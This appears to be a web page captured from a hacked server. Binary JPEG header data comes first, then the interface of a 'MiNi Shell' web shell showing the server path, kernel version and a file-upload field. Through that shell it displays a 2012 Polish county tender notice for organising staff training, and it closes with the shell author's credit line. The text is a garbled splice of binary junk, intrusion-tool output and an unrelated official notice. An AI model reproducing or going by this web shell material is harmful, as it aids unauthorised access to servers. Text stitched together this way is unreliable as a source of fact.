JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120315/81180-N-2012.html

<p class="kh_header"><b>Rawa Mazowiecka: obsługa szkoleń Wystąpienia publiczne - radzenie sobie 
ze stresem oraz Coaching i delegowanie zadań pracowników dla 18 uczestników projektu STAROSTWO RAWSKIE - PRZYJAZNE OBYWATELOM, NOWOCZESNE 
I SKUTECZNE współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet 
V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej.</b><br>
<b>Numer ogłoszenia: 81180 - 2012; data zamieszczenia: 15.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Rawskiego , pl. Wolności 1, 96-200 Rawa Mazowiecka, woj. łódzkie, tel. 046 8144631, faks 046 8144631.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiatrawski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> obsługa szkoleń Wystąpienia publiczne - radzenie sobie 
ze stresem oraz Coaching i delegowanie zadań pracowników dla 18 uczestników projektu STAROSTWO RAWSKIE - PRZYJAZNE OBYWATELOM, NOWOCZESNE 
I SKUTECZNE współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet 
V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest obsługa szkoleń Wystąpienia publiczne - radzenie sobie ze stresem oraz Coaching i delegowanie zadań pracowników dla 18 uczestników projektu STAROSTWO RAWSKIE - PRZYJAZNE OBYWATELOM, NOWOCZESNE I SKUTECZNE współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej.
1.Szkolenia powinny być przeprowadzone w odległości nie mniejszej niż 200 km od granic administracyjnych miasta Rawa Mazowiecka z wyłączeniem dużych aglomeracji miejskich powyżej 50 tys. mieszkańców.
2. W szkoleniach weźmie udział 18 pracowników Starostwa Powiatowego w Rawie Mazowieckiej podzielonych na 3 grupy szkoleniowe po 6 osób w każdej z grup.
3. Zamówienie należy wykonać w następujących terminach:
1 grupa uczestników w dniach 07-11.05.2012 r. (przyjazd w dniu 07.05.2012 r. na kolację)
2 grupa uczestników w dniach 14-18.05.2012 r. (przyjazd w dniu 14.05.2012 r. na kolację)
3 grupa uczestników w dniach 21-25.05.2012 r. (przyjazd w dniu 21.05.2012 r. na kolację)
4. Wykonawca zobowiązany jest do zapewnienia uczestnikom szkoleń:
1) klimatyzowanej sali szkoleniowej na min. 10 osób dla każdej grupy szkoleniowej, przystosowanej do prowadzenia zajęć dydaktycznych, w której zostaną przeprowadzone dwa 2-dniowe szkolenia w trzech kolejnych tygodniach osobno dla każdej z grup zorganizowane przez Zamawiającego wyposażonej w co najmniej: 
a) miejsca siedzące oraz stoły dla wszystkich uczestników szkolenia oraz trenera,
b) swobodny dostęp do sanitariatów,
c) projektor multimedialny, ekran do projektora multimedialnego, flipchart, nagłośnienie, mikrofony bezprzewodowe,
d) warunki pracy osób szkolących się w trakcie trwania szkolenia zgodnie z przepisami BHP,
e) bezpłatny dostęp do internetu,
f) oznaczenia sali szkoleniowej materiałami promocyjnymi projektu dostarczonymi przez Zamawiającego przed rozpoczęciem szkolenia,
2) zakwaterowania w hotelu co najmniej 3 kategorii z zapleczem rekreacyjnym (w tym basen, sauna, jacuzzi) zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których 
są świadczone usługi hotelarskie(Dz. U. z 2006 r. Nr 22, poz. 169 z późn. zm.) w tym:
a) każdy uczestnik powinien być zakwaterowany na 4 doby hotelowe w pokoju 
1 osobowym lub 2 osobowym z osobnymi węzłami sanitarnymi (maksymalna liczba pokoi 1 osobowych - 3 w ogólnej liczbie uczestników),
b) temperatura w pokojach od 18 do 24 stopni Celsjusza;
3) dla każdej grupy szkoleniowej wyżywienia w każdym dniu pobytu w tym:
a) serwowanej kolacji w dniu przyjazdu oraz w 2, 3 i 4 dniu pobytu w godz. 
18:00-19:00,
b) śniadania w godz. 7:30-8:30 w 2, 3, 4  i 5 dniu pobytu formie bufetu szwedzkiego,
c) obiadów serwowanych w 2, 3, 4, i 5 dniu pobytu podczas przerwy obiadowej składających się z: 
1) 1 danie - zupa, 
2) danie główne, 
3) deser (ciasto lub lody), kawa, herbata,
d)  2 przerw kawowych w każdym dniu szkolenia (2, 3, 4, 5 dzień pobytu) obejmujących na osobę minimum: 
- 0,5 l kawy naturalna-rozpuszczalna oraz herbaty, 
- 0,5 l wody mineralnej niegazowanej 
- 3 rodzaje ciastek różnych w ilości 0,20 dkg, 
- cukier, śmietanka/mleko do kawy, cytryna do herbaty,
e) codziennie powinno być serwowane inne menu dla każdej z grup. 
Wykonawca uzgodni z Zamawiającym menu dla każdej z grup nie później niż 7 dni przed planowanym terminem szkolenia.
4) dojazdu na miejsce szkolenia z siedziby Zamawiającego w dniu poprzedzającym szkolenie oraz z powrotem dla każdej z grup zgodnie z harmonogramem w tym:
a) zapewnienie klimatyzowanego autokaru/busa z co najmniej 10 miejscami siedzącymi wraz z miejscem na bagaże,
b) ubezpieczenia uczestników szkolenia na czas przejazdu.
Odległość od granic administracyjnych miasta Rawa Mazowiecka do hotelu, w którym przeprowadzone zostaną szkolenia liczona będzie przy użyciu mapy Polski dostępnej 
na stronie internetowej www.targeo.pl z wyborem optymalnego rodzaju trasy. Wykonawca uzgodni z Zamawiającym przebieg trasy przed podpisaniem umowy. 
5.Szkolenia zostaną przeprowadzone przez Zamawiającego w trzech grupach szkoleniowych po 6 osób każda. Szkolenia dla każdej z grup będzie trwać 4 dni (08-11.05.2012 r., 
15-18.05.2012 r., 22-25.05.2012 r.) po 8 godzin lekcyjnych dziennie w godzinach:
9:00 - 10:30	warsztaty
10:30 - 10:45 	przerwa kawowa
10:45 - 12:15 	warsztaty
12:15 - 13:15 	przerwa obiadowa
13:15 - 14:45 	warsztaty
14:45 - 15:00 	przerwa kawowa
15:00 - 16:30	warsztaty/dyskusja 
Zamawiający zastrzega sobie prawo do zmiany godzin warsztatów.
6.Zamawiający przewiduje 6-osobowe 3 grupy szkoleniowe lecz dopuszcza odstępstwo w liczebności poszczególnych grup przy niezmiennej ogólnej liczbie uczestników szkoleń. Ostateczną liczbę uczestników w poszczególnych grupach szkoleniowych, ilość pokoi 1 i 2 osobowych oraz godzinę wyjazdu Zamawiający przedstawi Wykonawcy nie później niż 7 dni przed planowanym terminem szkolenia. 
7.Zamawiający informuje, iż niniejsze postępowanie dotyczy wyłącznie obsługi technicznej szkoleń..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.12.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.05.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu tj.  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu wykonali, 
w okresie ostatnich trzech lat przez upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzy zamówienia odpowiadające swoim przedmiotem i zakresem przedmiotowi zamówienia określonemu w niniejszym postępowaniu. 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu tj. dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj.: co najmniej jedną osobą zdolną do wykonania zamówienia odpowiedzialną za pobyt uczestników w hotelu. 
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu tj. znajdują się w sytuacji ekonomicznej i finansowej umożliwiającej wykonanie zamówienia tj. posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 300.000 zł. Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) dokument potwierdzający posiadanie uprawnień do prowadzenia działalności gospodarczej objętej wpisem do właściwego rejestru lub ewidencji działalności 
gospodarcze, jeżeli przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej;
2) zaświadczenie potwierdzające, że obiekt przeznaczony na wykonanie usługi posiada co najmniej 3 kategorię zgodnie z Rozporządzeniem Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie(Dz. U. z 2006 r. Nr 22, poz. 169 z późn. zm.).
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie spełnia-nie spełnia.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość wprowadzenia istotnej zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie:
1) zaprzestania finansowania projektu w wyniku rozwiązania umowy pomiędzy Zarządem Powiatu Rawskiego a Instytucją Wdrażającą, Wykonawca wyraża 
zgodę na rozwiązanie umowy i nie będzie rościł pretensji do jakiegokolwiek odszkodowania z tego tytułu. W przypadku, gdy zatwierdzony przez Instytucję Wdrażającą wniosek o dofinansowanie będzie przewidywał skrócenie okresu jego realizacji, Wykonawca otrzyma wynagrodzenie za rzeczywisty okres świadczenia usług będących przedmiotem zamówienia, obliczone proporcjonalnie w stosunku 
do wynagrodzenia za wykonanie tegoż przedmiotu zamówienia ujętego w treści oferty;
2) zmiany obiektu hotelarskiego zaoferowanego w ofercie na inny o porównywalnych standardach w przypadku zaistnienia okoliczności, na które Wykonawca nie miał wpływu i nie mógł przewidzieć w dniu składania oferty, a które uniemożliwiają wykonanie zamówienia w zaoferowanym obiekcie hotelowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatrawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Powiatu Rawskiego
Plac Wolności 1,
96-200 Rawa Mazowiecka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2012 godzina 10:00, miejsce: Ofertę należy złożyć w zamkniętej kopercie w kancelarii Starostwa Powiatowego 
w Rawie Mazowieckiej przy Pl. Wolności 1, 96-200 Rawa Mazowiecka, pokój nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> =Projekt pn. STAROSTWO RAWSKIE - PRZYJAZNE OBYWATELOM, NOWOCZESNE I SKUTECZNE współfinansowany jest ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki - Priorytet 
V Dobre rządzenie, Działanie 5.2 Wzmocnienie potencjału administracji samorządowej, Poddziałanie 5.2.1 Modernizacja zarządzania w administracji samorządowej.
Projekt realizowany jest przez Powiat Rawski. Grupę docelową stanowi 60 pracowników Starostwa Powiatowego w Rawie Mazowieckiej. 
Okres realizacji projektu: od 01.07.2011 r. do 30.09.2013 r.
Wartość projektu wynosi: 820.597,20 zł
Celem głównym projektu jest wzmocnienie potencjału administracji samorządowej.
Celami szczegółowymi projektu są: 
1) zwiększenie kompetencji zawodowych i umiejętności interpersonalnych 60 pracowników Starostwa Powiatowego w Rawie Mazowieckiej;
2) poprawa sprawności obsługi klientów w urzędzie poprzez utworzenie Biura Obsługi Klientów;
3) wdrożenie przejrzystych zasad publikowania w Biuletynie Informacji Publicznej wszystkich danych wynikających z zasad przejrzystości urzędu;
4) uproszczenie i informatyzacja usług świadczonych w urzędzie poprzez umożliwienie składania wniosków z zakresu dziesięciu najbardziej powszechnych usług przez platformę e-PUAP.
W ramach wdrażanego projektu przewidziana jest realizacja następujących działań:
1) zarządzanie projektem;
2) poprawa wiedzy zawodowej i umiejętności interpersonalnych pracowników Starostwa Powiatowego w Rawie Mazowieckiej;
3) utworzenie biura obsługi klienta;
4) wdrożenie zasad publikowania w Biuletynie Informacji Publicznej, w systemie kwartalnym, wszystkich danych wynikających z zasad przejrzystości urzędu;
5) zwiększenie możliwości korzystania z usług Starostwa Rawskiego przez udostępnienie dziesięciu wniosków najpowszechniejszych usług w platformie e-PUAP..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com